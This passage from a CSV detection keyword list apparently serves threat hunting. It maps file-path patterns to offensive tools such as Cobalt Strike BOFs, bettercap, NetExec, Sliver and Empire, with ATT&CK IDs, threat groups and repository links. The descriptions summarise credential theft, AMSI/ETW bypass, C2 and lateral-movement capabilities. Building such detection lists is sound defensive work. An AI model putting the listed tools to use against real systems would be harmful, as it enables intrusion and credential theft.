Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" +"*/ndmp-fs-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ndmp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ndp_spoof*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/Needle_Sift_BOF/*","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" +"*/nessus.py*","offensive_tool_keyword","crackmapexec","parser nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/nessus.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/nessus-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/nessus-xmlrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/net_recon/*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/net_sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/net_sniff_*.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/netbus-auth-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/netbus-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/netbus-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/netbus-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/netcreds.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/NetExec.git*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/netexec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/NetExec-main*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/Net-GPPPassword.git*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" +"*/nethunter-images/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/NetLoader.git*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" +"*/netntlm.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/NetNTLMtoSilverTicket*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" +"*/netscan.exe*","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Network Exploitation tools","https://www.softperfect.com/products/networkscanner/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" +"*/netscan.exe*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*/netscan_linux.tar.gz*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*/netscan_portable.zip*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*/netscan_setup.exe*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*/netshrun.c*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/netsparker.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/netstat_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/nettitude/*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/nettitude/RunOF/*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"*/NetUser.cpp*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" +"*/NetUser.exe*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" +"*/netuserenum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*/network/bloodhound3*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/Network/PortScan/*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*/NewPhish.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/Newtonsoft.Json.dll*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*/nexpose-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/nfs-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/nfs-showmount.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/nfs-statfs.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/nginxed-root.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/nidem/kerberoast*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*/Nightmangle.git*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - 